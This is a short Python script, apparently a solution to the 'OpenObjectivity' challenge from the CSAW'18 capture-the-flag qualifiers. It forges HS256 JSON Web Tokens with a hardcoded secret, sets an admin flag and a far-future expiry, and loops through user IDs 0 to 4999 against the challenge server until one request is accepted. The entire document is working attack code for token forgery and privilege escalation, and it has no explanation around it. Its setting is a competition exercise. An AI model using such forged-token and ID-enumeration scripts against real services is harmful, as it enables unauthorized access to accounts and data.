Script for challenge 'OpenObjectivity' from the CSAW'18 RTC Qualifiers.

open_objectivity.py

import jwt
import requests as rq


key = "dId_you_r3aLly_think_I_w0u1dnt_s3t_a_key"

payload = {
    'exp': 99999999999,
    'iat': 0,
    'sub': 1,
    'admin': True
}

url = "http://web.chal.csaw.io:10106"

for i in range(5000):
    print(i)
    payload["sub"] = i
    auth = jwt.encode(
        payload,
        key,
        algorithm='HS256'
    )
    r = rq.get(url+"/default/record", headers={"Authorization": auth})
    print(r.text)
    if r.status_code == 200:
        print(rq.get(url+"/user", headers={"Authorization": auth}).text)
        break